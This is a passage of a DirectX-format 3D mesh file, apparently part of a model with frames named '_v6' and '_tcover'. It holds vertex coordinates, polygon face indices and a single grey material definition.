-1.091170;1.071006;-0.368488;, -1.089583;1.070911;-0.361593;, -1.086662;1.070738;-0.355037;, -1.082265;1.070477;-0.348859;, -1.076239;1.070119;-0.343321;, -1.069842;1.069739;-0.339807;, -1.064447;1.069419;-0.338372;, -1.056462;1.068945;-0.337694;, -1.048328;1.068462;-0.338201;, -1.042451;1.068113;-0.339559;, -1.035465;1.067698;-0.342858;, -1.029292;1.067332;-0.347846;, -1.024635;1.067055;-0.353642;, -1.021012;1.066840;-0.360495;, -1.018351;1.066682;-0.369336;, -1.017316;1.066621;-0.379531;, -1.018093;1.066667;-0.389557;, -1.020422;1.066805;-0.397846;, -1.024562;1.067051;-0.405504;, -1.030330;1.067393;-0.411891;, -1.036872;1.067782;-0.416332;, -1.046113;1.068330;-0.420012;, -1.057210;1.068989;-0.393910;, -1.053795;1.068787;-0.394071;, -1.050006;1.068562;-0.393589;, -1.047292;1.068401;-0.392679;, -1.044742;1.068249;-0.391099;, -1.042543;1.068119;-0.388984;, -1.040928;1.068023;-0.386682;, -1.039782;1.067955;-0.384139;, -1.039034;1.067910;-0.381087;, -1.038869;1.067900;-0.377900;, -1.039430;1.067934;-0.374259;, -1.040764;1.068013;-0.370833;, -1.042472;1.068114;-0.368237;, -1.044508;1.068235;-0.366282;, -1.046659;1.068363;-0.364998;, -1.049584;1.068537;-0.363954;, -1.052368;1.068702;-0.363443;, -1.055315;1.068877;-0.363336;, -1.058357;1.069058;-0.363657;, -1.060931;1.069210;-0.364353;, -1.063456;1.069360;-0.365558;, -1.065516;1.069483;-0.367110;, -1.067294;1.069588;-0.369120;, -1.068675;1.069670;-0.371474;, -1.069774;1.069735;-0.374767;, -1.070148;1.069758;-0.378301;, -1.069844;1.069739;-0.381488;, -1.068907;1.069684;-0.384674;, -1.067294;1.069588;-0.387779;, -1.065234;1.069466;-0.390242;, -1.062897;1.069327;-0.391982;, -1.059924;1.069151;-0.393321;, -1.044037;1.103309;-0.420012;, -1.054535;1.103932;-0.422127;, -1.069025;1.104792;-0.422930;, -1.082555;1.105596;-0.422169;, -1.093755;1.106261;-0.420265;, -1.107059;1.107051;-0.415739;, -1.115897;1.107575;-0.410239;, -1.122586;1.107973;-0.403175;, -1.127024;1.108236;-0.395263;, -1.129314;1.108372;-0.387227;, -1.130125;1.108420;-0.377075;, -1.129426;1.108379;-0.368444;, -1.127616;1.108271;-0.361128;, -1.124582;1.108091;-0.354400;, -1.120700;1.107861;-0.348987;, -1.115565;1.107556;-0.344502;, -1.109903;1.107220;-0.341757;, -1.107500;1.107077;-0.341164;, -1.102628;1.106788;-0.340356;, -1.103357;1.106831;-0.362722;, -1.105086;1.106933;-0.363166;, -1.105940;1.106984;-0.363441;, -1.107799;1.107095;-0.364467;, -1.109440;1.107192;-0.365934;, -1.110734;1.107269;-0.367706;, -1.111694;1.107326;-0.369726;, -1.112373;1.107366;-0.372411;, -1.112570;1.107378;-0.375593;, -1.112178;1.107355;-0.379025;, -1.111214;1.107297;-0.382152;, -1.109395;1.107189;-0.385363;, -1.106857;1.107039;-0.388020;, -1.104234;1.106883;-0.389654;, -1.100050;1.106635;-0.391176;, -1.095936;1.106390;-0.392061;, -1.091011;1.106098;-0.392615;, -1.089720;1.106021;-0.392698;, -1.087136;1.105868;-0.392809;, -1.085697;1.105782;-0.392642;, -1.087360;1.105881;-0.388962;, -1.088839;1.105969;-0.383460;, -1.089541;1.106011;-0.376569;, -1.089094;1.105984;-0.368488;, -1.087506;1.105890;-0.361593;, -1.084585;1.105716;-0.355037;, -1.080188;1.105455;-0.348859;, -1.074162;1.105098;-0.343321;, -1.067765;1.104718;-0.339807;, -1.062370;1.104397;-0.338372;, -1.054385;1.103923;-0.337694;, -1.046251;1.103440;-0.338201;, -1.040374;1.103091;-0.339559;, -1.033388;1.102676;-0.342858;, -1.027216;1.102310;-0.347846;, -1.022558;1.102033;-0.353642;, -1.018936;1.101818;-0.360495;, -1.016274;1.101660;-0.369336;, -1.015240;1.101599;-0.379531;, -1.016016;1.101645;-0.389557;, -1.018344;1.101783;-0.397846;, -1.022485;1.102029;-0.405504;, -1.028252;1.102371;-0.411891;, -1.034795;1.102760;-0.416332;, -1.057847;1.104129;-0.393321;, -1.055133;1.103968;-0.393910;, -1.051718;1.103765;-0.394071;, -1.047928;1.103540;-0.393589;, -1.045215;1.103379;-0.392679;, -1.042664;1.103227;-0.391099;, -1.040466;1.103097;-0.388984;, -1.038852;1.103001;-0.386682;, -1.037705;1.102933;-0.384139;, -1.036956;1.102888;-0.381087;, -1.036792;1.102879;-0.377900;, -1.037354;1.102912;-0.374259;, -1.038687;1.102991;-0.370833;, -1.040394;1.103092;-0.368237;, -1.042430;1.103213;-0.366282;, -1.044582;1.103341;-0.364998;, -1.047507;1.103515;-0.363954;, -1.050291;1.103680;-0.363443;, -1.053238;1.103855;-0.363337;, -1.056280;1.104036;-0.363658;, -1.058853;1.104188;-0.364353;, -1.061380;1.104338;-0.365558;, -1.063440;1.104461;-0.367110;, -1.065217;1.104566;-0.369120;, -1.066597;1.104648;-0.371474;, -1.067697;1.104713;-0.374767;, -1.068071;1.104736;-0.378301;, -1.067766;1.104718;-0.381488;, -1.066831;1.104662;-0.384674;, -1.065218;1.104566;-0.387779;, -1.063157;1.104444;-0.390242;, -1.060819;1.104305;-0.391982;; 207; 4;7,5,0,8;, 4;8,0,1,9;, 4;9,1,2,10;, 4;10,2,3,11;, 4;11,3,4,6;, 4;6,4,5,7;, 4;125,29,30,126;, 4;9,10,7,8;, 4;6,7,10,11;, 4;0,5,2,1;, 4;2,5,4,3;, 4;164,165,178,179;, 3;180,164,179;, 4;163,164,180,181;, 4;162,163,181,182;, 4;161,162,182,183;, 4;160,161,183,184;, 4;159,160,184,185;, 4;158,159,185,186;, 4;157,158,186,187;, 4;156,157,187,188;, 3;189,156,188;, 4;155,156,189,190;, 5;190,191,153,154,155;, 4;152,153,191,192;, 4;151,152,192,193;, 4;150,151,193,194;, 4;149,150,194,195;, 4;148,149,195,196;, 4;147,148,196,197;, 5;146,147,197,198,145;, 3;199,145,198;, 3;200,145,199;, 4;109,145,200,201;, 3;170,109,201;, 4;108,109,170,171;, 3;172,108,171;, 4;107,108,172,173;, 4;169,107,173,174;, 4;168,169,174,175;, 4;167,168,175,176;, 4;166,167,176,177;, 4;165,166,177,178;, 3;109,110,145;, 3;145,110,144;, 4;110,111,143,144;, 3;143,111,142;, 3;142,111,141;, 4;111,112,140,141;, 4;112,113,139,140;, 4;113,114,138,139;, 4;114,115,137,138;, 4;115,116,136,137;, 3;136,116,135;, 4;116,117,134,135;, 4;117,118,133,134;, 4;118,119,132,133;, 3;132,119,131;, 4;119,120,130,131;, 4;120,121,129,130;, 4;121,122,128,129;, 4;122,123,127,128;, 5;126,127,123,124,125;, 4;164,68,69,165;, 4;163,67,68,164;, 4;162,66,67,163;, 4;161,65,66,162;, 4;160,64,65,161;, 4;159,63,64,160;, 4;158,62,63,159;, 4;157,61,62,158;, 4;156,60,61,157;, 4;155,59,60,156;, 4;154,58,59,155;, 4;153,57,58,154;, 4;152,56,57,153;, 4;151,55,56,152;, 4;150,54,55,151;, 4;149,53,54,150;, 4;148,52,53,149;, 4;147,51,52,148;, 4;146,50,51,147;, 4;145,49,50,146;, 4;110,14,15,111;, 4;111,15,16,112;, 4;112,16,17,113;, 4;113,17,18,114;, 4;114,18,19,115;, 4;115,19,20,116;, 4;116,20,21,117;, 4;117,21,22,118;, 4;118,22,23,119;, 4;119,23,24,120;, 4;120,24,25,121;, 4;121,25,26,122;, 4;122,26,27,123;, 4;123,27,28,124;, 4;124,28,29,125;, 4;109,13,14,110;, 4;108,12,13,109;, 4;107,74,12,108;, 4;169,73,74,107;, 4;168,72,73,169;, 4;167,71,72,168;, 4;166,70,71,167;, 4;165,69,70,166;, 4;69,68,83,82;, 3;83,68,84;, 4;68,67,85,84;, 4;67,66,86,85;, 4;66,65,87,86;, 4;65,64,88,87;, 4;64,63,89,88;, 4;63,62,90,89;, 4;62,61,91,90;, 4;61,60,92,91;, 4;60,59,93,92;, 4;59,58,94,93;, 4;58,57,95,94;, 4;57,56,96,95;, 4;56,55,97,96;, 4;55,54,98,97;, 4;54,53,99,98;, 4;53,52,100,99;, 4;52,51,101,100;, 5;50,49,102,101,51;, 3;102,49,103;, 3;103,49,104;, 3;105,104,49;, 5;48,14,106,105,49;, 3;106,14,75;, 5;13,12,76,75,14;, 4;12,74,77,76;, 4;74,73,78,77;, 4;73,72,79,78;, 4;72,71,80,79;, 4;71,70,81,80;, 4;70,69,82,81;, 4;15,14,48,47;, 3;46,15,47;, 3;45,15,46;, 4;16,15,45,44;, 4;17,16,44,43;, 4;18,17,43,42;, 4;19,18,42,41;, 4;20,19,41,40;, 3;39,20,40;, 4;21,20,39,38;, 4;22,21,38,37;, 4;23,22,37,36;, 3;35,23,36;, 4;24,23,35,34;, 4;25,24,34,33;, 4;26,25,33,32;, 4;27,26,32,31;, 5;28,27,31,30,29;, 4;134,38,39,135;, 4;133,37,38,134;, 4;132,36,37,133;, 4;131,35,36,132;, 4;130,34,35,131;, 4;129,33,34,130;, 4;128,32,33,129;, 4;127,31,32,128;, 4;126,30,31,127;, 4;135,39,40,136;, 4;136,40,41,137;, 4;137,41,42,138;, 4;138,42,43,139;, 4;139,43,44,140;, 4;140,44,45,141;, 4;141,45,46,142;, 4;142,46,47,143;, 4;143,47,48,144;, 4;144,48,49,145;, 4;195,99,100,196;, 4;196,100,101,197;, 4;197,101,102,198;, 4;198,102,103,199;, 4;199,103,104,200;, 4;200,104,105,201;, 4;201,105,106,170;, 4;170,106,75,171;, 4;171,75,76,172;, 4;172,76,77,173;, 4;173,77,78,174;, 4;174,78,79,175;, 4;175,79,80,176;, 4;176,80,81,177;, 4;177,81,82,178;, 4;178,82,83,179;, 4;179,83,84,180;, 4;180,84,85,181;, 4;181,85,86,182;, 4;182,86,87,183;, 4;183,87,88,184;, 4;184,88,89,185;, 4;185,89,90,186;, 4;186,90,91,187;, 4;187,91,92,188;, 4;188,92,93,189;, 4;189,93,94,190;, 4;190,94,95,191;, 4;191,95,96,192;, 4;192,96,97,193;, 4;193,97,98,194;, 4;194,98,99,195;; MeshMaterialList { 1; 207; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _v6 Frame _tcover { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh tcover { 1028; -0.322140;-0.580150;-1.344551;, -0.369105;-0.627115;-1.344550;, -0.559484;-0.657267;-1.344545;, -0.618661;-0.627115;-1.344543;, -0.706168;-0.455371;-1.344541;, -0.705258;-0.212809;-1.344541;, -0.705260;-0.212809;-1.425455;, -0.631196;0.007532;-1.344543;, -0.631197;0.007532;-1.425457;, -0.586759;0.054496;-1.344544;, -0.586761;0.054496;-1.425459;, -0.542711;0.084649;-1.344545;, -0.542713;0.084649;-1.425460;, -0.493884;0.095039;-1.344546;, -0.493886;0.095039;-1.425461;, -0.366051;0.007532;-1.344550;, -0.366054;0.007532;-1.425464;, -0.291987;-0.389772;-1.344552;, -0.291988;-0.389772;-1.425466;, -0.266108;-0.529380;-1.328226;, -0.254386;-0.455371;-1.328226;, -0.266108;-0.381362;-1.328226;, -0.349665;0.023527;-1.328223;, -0.389103;0.076511;-1.328222;, -0.438797;0.110529;-1.328221;, -0.493882;0.122251;-1.328220;, -0.548969;0.110529;-1.328218;, -0.598663;0.076511;-1.328217;, -0.647580;0.023527;-1.328216;, -0.731138;-0.204399;-1.328213;, -0.733380;-0.455371;-1.328213;, -0.721658;-0.529380;-1.328214;, -0.687639;-0.596143;-1.328214;, -0.634655;-0.649128;-1.328216;, -0.567892;-0.683146;-1.328218;, -0.493882;-0.694869;-1.328220;, -0.419872;-0.683146;-1.328222;, -0.353110;-0.649128;-1.328223;, -0.300126;-0.596143;-1.328225;, -0.419872;-0.683146;-1.302415;, -0.353109;-0.649128;-1.302417;, -0.300124;-0.596143;-1.302418;, -0.266107;-0.529380;-1.302419;, -0.254385;-0.455371;-1.302419;, -0.266107;-0.381362;-1.302419;, -0.349664;0.023527;-1.302417;, -0.389102;0.076511;-1.302416;, -0.438797;0.110529;-1.302414;, -0.493882;0.122251;-1.302413;, -0.548968;0.110529;-1.302411;, -0.598662;0.076511;-1.302410;, -0.647580;0.023527;-1.302409;, -0.731137;-0.204399;-1.302407;, -0.733379;-0.455371;-1.302407;, -0.721657;-0.529380;-1.302407;, -0.687638;-0.596143;-1.302408;, -0.634655;-0.649128;-1.302409;, -0.567892;-0.683146;-1.302411;, -0.493882;-0.694869;-1.302413;, -0.720146;-0.020498;-1.344479;, -0.755754;-0.058794;-1.344539;, -0.755756;-0.058794;-1.425454;, -0.718235;-0.020498;-1.425455;, -0.739302;-0.007854;-1.328208;, -0.776359;-0.046171;-1.328212;, -0.736182;-0.007860;-1.302407;, -0.776357;-0.046171;-1.302405;, -0.763984;-0.083282;-1.344539;, -0.765776;-0.123131;-1.344486;, -0.762539;-0.123141;-1.425454;, -0.763987;-0.083282;-1.425454;, -0.785645;-0.071501;-1.328212;, -0.787494;-0.132607;-1.328206;, -0.785644;-0.071501;-1.302405;, -0.786306;-0.132615;-1.302405;, -0.653556;-0.554103;-1.344542;, -0.663609;-0.534377;-1.344542;, -0.307181;-0.474078;-1.344551;, -0.310644;-0.495944;-1.344551;, -0.450150;-0.635450;-1.344547;, -0.472016;-0.638914;-1.344547;, -0.446176;0.055638;-1.425462;, -0.431492;0.045587;-1.425463;, -0.446173;0.055638;-1.344548;, -0.431490;0.045587;-1.344548;, -0.461331;0.088112;-1.425462;, -0.445429;0.074980;-1.425462;, -0.445428;0.074980;-1.344548;, -0.442969;0.093275;-1.339106;, -0.461330;0.088112;-1.344547;, -0.411171;0.051527;-1.425463;, -0.389359;0.038843;-1.425464;, -0.389358;0.038843;-1.344549;, -0.397039;0.061834;-1.339107;, -0.411169;0.051527;-1.344549;, -0.699241;-0.499107;-1.344541;, -0.704404;-0.523774;-1.339099;, -0.685056;-0.525439;-1.344541;, -0.661604;-0.571469;-1.344542;, -0.672962;-0.585481;-1.339100;, -0.649972;-0.595802;-1.344542;, -0.285062;-0.433507;-1.425466;, -0.290125;-0.461606;-1.344552;, -0.272527;-0.455371;-1.339110;, -0.285060;-0.433507;-1.344552;, -0.302037;-0.540696;-1.344551;, -0.283361;-0.523774;-1.339110;, -0.298205;-0.512630;-1.344552;, -0.435571;-0.649995;-1.344548;, -0.425479;-0.665893;-1.339107;, -0.408559;-0.647216;-1.344549;, -0.515749;-0.664194;-1.344546;, -0.493884;-0.676726;-1.339105;, -0.486595;-0.658077;-1.344547;, -0.369105;-0.627115;-1.347882;, -0.367424;-0.629427;-1.342836;, -0.319829;-0.581830;-1.342837;, -0.322140;-0.580150;-1.347883;, -0.408559;-0.647216;-1.347897;, -0.407693;-0.650146;-1.343174;, -0.435571;-0.649995;-1.348192;, -0.436733;-0.653274;-1.343463;, -0.450150;-0.635450;-1.348241;, -0.451230;-0.638779;-1.343369;, -0.299140;-0.541603;-1.343161;, -0.302037;-0.540696;-1.347889;, -0.294942;-0.511787;-1.343421;, -0.298205;-0.512630;-1.348108;, -0.307384;-0.495141;-1.343335;, -0.310644;-0.495944;-1.348123;, -0.472016;-0.638914;-1.348093;, -0.470299;-0.641787;-1.343374;, -0.486595;-0.658077;-1.348060;, -0.484810;-0.660900;-1.343459;, -0.515749;-0.664194;-1.347893;, -0.515672;-0.667245;-1.343169;, -0.559484;-0.657267;-1.347877;, -0.560368;-0.659984;-1.342831;, -0.618661;-0.627115;-1.347875;, -0.620341;-0.629427;-1.342829;, -0.649973;-0.595802;-1.347881;, -0.652453;-0.597558;-1.343155;, -0.661604;-0.571469;-1.348180;, -0.665063;-0.571489;-1.343414;, -0.653556;-0.554103;-1.348203;, -0.657008;-0.554168;-1.343326;, -0.307182;-0.474078;-1.348112;, -0.304324;-0.475823;-1.343335;, -0.287275;-0.463387;-1.343421;, -0.290125;-0.461606;-1.348096;, -0.282025;-0.433539;-1.343162;, -0.285060;-0.433507;-1.347890;, -0.289274;-0.389303;-1.342745;, -0.291987;-0.389772;-1.347843;, -0.363509;0.008643;-1.342620;, -0.366051;0.007532;-1.347928;, -0.387357;0.041080;-1.343035;, -0.389358;0.038843;-1.347910;, -0.410758;0.054902;-1.343418;, -0.411169;0.051527;-1.348130;, -0.430952;0.048971;-1.343315;, -0.431491;0.045587;-1.348190;, -0.443001;0.057233;-1.343311;, -0.446173;0.055638;-1.348306;, -0.442241;0.076407;-1.343412;, -0.445428;0.074980;-1.348220;, -0.459991;0.090885;-1.343131;, -0.461330;0.088112;-1.347937;, -0.493884;0.097925;-1.342815;, -0.493884;0.095039;-1.347913;, -0.543833;0.087267;-1.342772;, -0.542711;0.084649;-1.347900;, -0.588541;0.056585;-1.342694;, -0.586759;0.054496;-1.347854;, -0.632640;0.009840;-1.342505;, -0.631192;0.007526;-1.347944;, -0.721601;-0.018198;-1.342433;, -0.720135;-0.020517;-1.347884;, -0.758151;-0.057370;-1.342650;, -0.755739;-0.058801;-1.347906;, -0.766651;-0.082782;-1.342620;, -0.763951;-0.083290;-1.347863;, -0.768450;-0.123883;-1.342410;, -0.765712;-0.123115;-1.347952;, -0.707983;-0.213636;-1.342600;, -0.705230;-0.212799;-1.347984;, -0.708982;-0.455587;-1.342822;, -0.706168;-0.455371;-1.347843;, -0.702118;-0.500078;-1.343151;, -0.699241;-0.499107;-1.347880;, -0.687275;-0.527891;-1.343415;, -0.685057;-0.525439;-1.348033;, -0.665845;-0.536791;-1.343332;, -0.663609;-0.534377;-1.348049;, -0.310647;-0.495944;-1.421893;, -0.307184;-0.474078;-1.421905;, -0.298207;-0.512630;-1.421910;, -0.302039;-0.540696;-1.422127;, -0.322143;-0.580150;-1.422132;, -0.369107;-0.627115;-1.422131;, -0.408561;-0.647216;-1.422115;, -0.435574;-0.649995;-1.421818;, -0.450152;-0.635450;-1.421769;, -0.472019;-0.638914;-1.421914;, -0.486598;-0.658077;-1.421947;, -0.515750;-0.664194;-1.422114;, -0.559486;-0.657267;-1.422126;, -0.618663;-0.627115;-1.422124;, -0.649974;-0.595802;-1.422117;, -0.661606;-0.571469;-1.421819;, -0.653558;-0.554103;-1.421796;, -0.663610;-0.534377;-1.421949;, -0.685060;-0.525439;-1.421962;, -0.699244;-0.499107;-1.422116;, -0.706171;-0.455371;-1.422153;, -0.701966;-0.211853;-1.425456;, -0.705289;-0.212817;-1.422024;, -0.759284;-0.122124;-1.425454;, -0.762602;-0.123160;-1.422043;, -0.760675;-0.083762;-1.425454;, -0.764019;-0.083277;-1.422108;, -0.752876;-0.060559;-1.425454;, -0.755767;-0.058786;-1.422077;, -0.716453;-0.023383;-1.425455;, -0.718246;-0.020480;-1.422064;, -0.629385;0.004657;-1.425457;, -0.631201;0.007538;-1.422059;, -0.584612;0.051979;-1.425459;, -0.586761;0.054496;-1.422148;, -0.541391;0.081565;-1.425460;, -0.542713;0.084649;-1.422104;, -0.493886;0.091674;-1.425461;, -0.493886;0.095039;-1.422095;, -0.462806;0.085060;-1.425462;, -0.461331;0.088112;-1.422072;, -0.448782;0.073479;-1.425462;, -0.445429;0.074980;-1.421790;, -0.449534;0.053949;-1.425462;, -0.446176;0.055638;-1.421702;, -0.432066;0.041990;-1.425463;, -0.431492;0.045587;-1.421820;, -0.411603;0.047971;-1.425463;, -0.411170;0.051527;-1.421881;, -0.391596;0.036337;-1.425464;, -0.389359;0.038843;-1.422103;, -0.369149;0.006179;-1.425464;, -0.366054;0.007532;-1.422086;, -0.295233;-0.390330;-1.425466;, -0.291988;-0.389772;-1.422175;, -0.288400;-0.433471;-1.425466;, -0.285062;-0.433507;-1.422127;, -0.290127;-0.461606;-1.421920;, -0.493882;-0.691536;-1.302413;, -0.493882;-0.694869;-1.305745;, -0.567892;-0.683146;-1.305744;, -0.566861;-0.679977;-1.302411;, -0.420903;-0.679977;-1.302415;, -0.419872;-0.683146;-1.305747;, -0.355068;-0.646432;-1.302417;, -0.353109;-0.649128;-1.305749;, -0.302821;-0.594186;-1.302418;, -0.300124;-0.596143;-1.305750;, -0.269278;-0.528350;-1.302419;, -0.266108;-0.529380;-1.305751;, -0.257719;-0.455371;-1.302419;, -0.254385;-0.455371;-1.305752;, -0.269345;-0.381953;-1.302419;, -0.266108;-0.381362;-1.305711;, -0.352740;0.022146;-1.302417;, -0.349664;0.023527;-1.305787;, -0.391414;0.074104;-1.302416;, -0.389102;0.076511;-1.305752;, -0.440118;0.107445;-1.302414;, -0.438797;0.110529;-1.305769;, -0.493882;0.118885;-1.302413;, -0.493882;0.122251;-1.305777;, -0.547647;0.107445;-1.302412;, -0.548968;0.110529;-1.305766;, -0.596497;0.074004;-1.302410;, -0.598662;0.076511;-1.305721;, -0.645714;0.020696;-1.302409;, -0.647600;0.023556;-1.305800;, -0.734420;-0.010727;-1.302407;, -0.736239;-0.007767;-1.305771;, -0.773530;-0.048025;-1.302406;, -0.776419;-0.046130;-1.305783;, -0.782357;-0.072103;-1.302405;, -0.785682;-0.071495;-1.305744;, -0.783002;-0.131513;-1.302405;, -0.786378;-0.132640;-1.305886;, -0.727837;-0.203295;-1.302407;, -0.731168;-0.204410;-1.305888;, -0.730085;-0.455126;-1.302407;, -0.733379;-0.455371;-1.305708;, -0.718487;-0.528350;-1.302407;, -0.721657;-0.529380;-1.305739;, -0.684944;-0.594186;-1.302408;, -0.687639;-0.596143;-1.305740;, -0.632696;-0.646432;-1.302409;, -0.634655;-0.649128;-1.305742;, -0.733380;-0.455371;-1.324910;, -0.730568;-0.455163;-1.329935;, -0.728414;-0.203471;-1.330181;, -0.731106;-0.204389;-1.324725;, -0.721658;-0.529380;-1.324881;, -0.718820;-0.528459;-1.329696;, -0.687639;-0.596143;-1.324882;, -0.685225;-0.594390;-1.329697;, -0.634655;-0.649128;-1.324884;, -0.632978;-0.646820;-1.329939;, -0.567892;-0.683146;-1.324885;, -0.567010;-0.680434;-1.329941;, -0.493882;-0.694869;-1.324887;, -0.493882;-0.691876;-1.329685;, -0.419872;-0.683146;-1.324889;, -0.420799;-0.680300;-1.329687;, -0.353110;-0.649128;-1.324891;, -0.354786;-0.646822;-1.329946;, -0.300124;-0.596143;-1.324892;, -0.302433;-0.594467;-1.329948;, -0.266108;-0.529380;-1.324893;, -0.268945;-0.528459;-1.329709;, -0.254386;-0.455371;-1.324894;, -0.257371;-0.455371;-1.329707;, -0.266108;-0.381362;-1.324933;, -0.268808;-0.381854;-1.330041;, -0.349665;0.023527;-1.324852;, -0.352180;0.022398;-1.330166;, -0.389103;0.076511;-1.324884;, -0.391126;0.074406;-1.329839;, -0.438797;0.110529;-1.324865;, -0.439979;0.107772;-1.329727;, -0.493882;0.122251;-1.324854;, -0.493882;0.119369;-1.329959;, -0.548969;0.110529;-1.324862;, -0.547846;0.107910;-1.329990;, -0.598663;0.076511;-1.324904;, -0.596865;0.074431;-1.330066;, -0.647562;0.023498;-1.324820;, -0.646100;0.021253;-1.330256;, -0.739245;-0.007946;-1.324825;, -0.737854;-0.010134;-1.330250;, -0.776297;-0.046211;-1.324848;, -0.773994;-0.047654;-1.330092;, -0.785605;-0.071509;-1.324877;, -0.782969;-0.072019;-1.330135;, -0.787422;-0.132584;-1.324705;, -0.784837;-0.131735;-1.330314;, -0.493886;-0.624968;-1.437623;, -0.493886;-0.621616;-1.439298;, -0.493886;-0.606534;-1.439298;, -0.493886;-0.604858;-1.439298;, -0.493886;-0.604858;-1.441811;, -0.493886;-0.604858;-1.454380;, -0.493887;-0.601506;-1.463597;, -0.493887;-0.595641;-1.469463;, -0.493887;-0.587261;-1.471976;, -0.493887;-0.561286;-1.471976;, -0.493887;-0.556258;-1.474491;, -0.493887;-0.553745;-1.480356;, -0.493887;-0.552069;-1.506332;, -0.493888;-0.551230;-1.518062;, -0.493888;-0.546203;-1.521414;, -0.493888;-0.538662;-1.521414;, -0.493888;-0.538662;-1.525605;, -0.493888;-0.519390;-1.526442;, -0.493888;-0.520227;-1.516388;, -0.521760;-0.622038;-1.437622;, -0.521062;-0.618759;-1.439297;, -0.517926;-0.604007;-1.439297;, -0.517579;-0.602367;-1.439297;, -0.517579;-0.602367;-1.441810;, -0.517580;-0.602367;-1.454380;, -0.516883;-0.599089;-1.463597;, -0.515663;-0.593352;-1.469463;, -0.513921;-0.585156;-1.471976;, -0.508521;-0.559748;-1.471976;, -0.507475;-0.554830;-1.474490;, -0.506952;-0.552370;-1.480356;, -0.506607;-0.550733;-1.506331;, -0.506432;-0.549912;-1.518061;, -0.505386;-0.544994;-1.521414;, -0.503819;-0.537618;-1.521414;, -0.503819;-0.537618;-1.525604;, -0.499810;-0.518767;-1.526442;, -0.499985;-0.519586;-1.516387;, -0.548417;-0.613378;-1.437621;, -0.547052;-0.610315;-1.439296;, -0.540917;-0.596536;-1.439296;, -0.540237;-0.595006;-1.439296;, -0.540237;-0.595006;-1.441810;, -0.540238;-0.595006;-1.454379;, -0.538874;-0.591944;-1.463596;, -0.536489;-0.586584;-1.469462;, -0.533081;-0.578931;-1.471975;, -0.522515;-0.555202;-1.471976;, -0.520472;-0.550608;-1.474490;, -0.519448;-0.548311;-1.480355;, -0.518766;-0.546780;-1.506331;, -0.518426;-0.546014;-1.518061;, -0.516380;-0.541422;-1.521413;, -0.513314;-0.534534;-1.521414;, -0.513314;-0.534534;-1.525604;, -0.505476;-0.516927;-1.526441;, -0.505816;-0.517691;-1.516387;, -0.572689;-0.599363;-1.437620;, -0.570718;-0.596652;-1.439295;, -0.561853;-0.584450;-1.439296;, -0.560868;-0.583094;-1.439296;, -0.560868;-0.583094;-1.441809;, -0.560869;-0.583094;-1.454379;, -0.558899;-0.580381;-1.463596;, -0.555451;-0.575637;-1.469462;, -0.550528;-0.568858;-1.471975;, -0.535257;-0.547844;-1.471975;, -0.532304;-0.543776;-1.474490;, -0.530827;-0.541743;-1.480355;, -0.529841;-0.540386;-1.506331;, -0.529349;-0.539708;-1.518061;, -0.526394;-0.535641;-1.521413;, -0.521960;-0.529540;-1.521413;, -0.521960;-0.529540;-1.525604;, -0.510634;-0.513948;-1.526441;, -0.511127;-0.514626;-1.516387;, -0.593516;-0.580610;-1.437620;, -0.591026;-0.578366;-1.439295;, -0.579818;-0.568273;-1.439295;, -0.578572;-0.567152;-1.439295;, -0.578572;-0.567152;-1.441809;, -0.578573;-0.567152;-1.454378;, -0.576081;-0.564910;-1.463595;, -0.571723;-0.560986;-1.469461;, -0.565497;-0.555378;-1.471975;, -0.546194;-0.537998;-1.471975;, -0.542458;-0.534633;-1.474489;, -0.540588;-0.532951;-1.480355;, -0.539345;-0.531830;-1.506330;, -0.538723;-0.531269;-1.518061;, -0.534986;-0.527905;-1.521413;, -0.529381;-0.522859;-1.521413;, -0.529381;-0.522859;-1.525604;, -0.515060;-0.509963;-1.526441;, -0.515681;-0.510523;-1.516387;, -0.609992;-0.557935;-1.437619;, -0.607090;-0.556258;-1.439294;, -0.594027;-0.548716;-1.439295;, -0.592576;-0.547879;-1.439295;, -0.592576;-0.547879;-1.441809;, -0.592576;-0.547879;-1.454378;, -0.589674;-0.546203;-1.463595;, -0.584593;-0.543271;-1.469461;, -0.577338;-0.539081;-1.471974;, -0.554842;-0.526093;-1.471975;, -0.550488;-0.523580;-1.474489;, -0.548311;-0.522322;-1.480355;, -0.546860;-0.521483;-1.506330;, -0.546135;-0.521065;-1.518060;, -0.541780;-0.518551;-1.521413;, -0.535250;-0.514781;-1.521413;, -0.535250;-0.514781;-1.525603;, -0.518560;-0.505145;-1.526441;, -0.519286;-0.505564;-1.516387;, -0.621390;-0.532329;-1.437619;, -0.618203;-0.531295;-1.439294;, -0.603859;-0.526633;-1.439294;, -0.602266;-0.526115;-1.439294;, -0.602266;-0.526115;-1.441808;, -0.602266;-0.526115;-1.454378;, 